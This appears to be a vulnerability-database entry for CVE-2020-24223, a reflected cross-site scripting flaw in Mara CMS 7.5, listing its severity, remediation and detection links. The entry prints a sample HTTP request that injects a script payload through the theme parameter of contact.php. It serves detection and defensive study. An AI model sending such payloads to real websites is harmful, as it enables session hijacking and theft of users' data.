🔙 목록으로 돌아가기

CVE-2020-24223: Mara CMS 7.5 - Cross-Site Scripting

TitleMara CMS 7.5 - Cross-Site Scripting
Authorpikpikcu
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability.
CVSS Score6.1
EPSS Score0.15272
CVE IDCVE-2020-24223
CWE IDCWE-79
Tags cve2020 cve mara xss edb mara_cms_project vuln

🔍 Vulnerability Description

Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.

🌐 HTTP Request

GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.8
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24223.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-24223.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A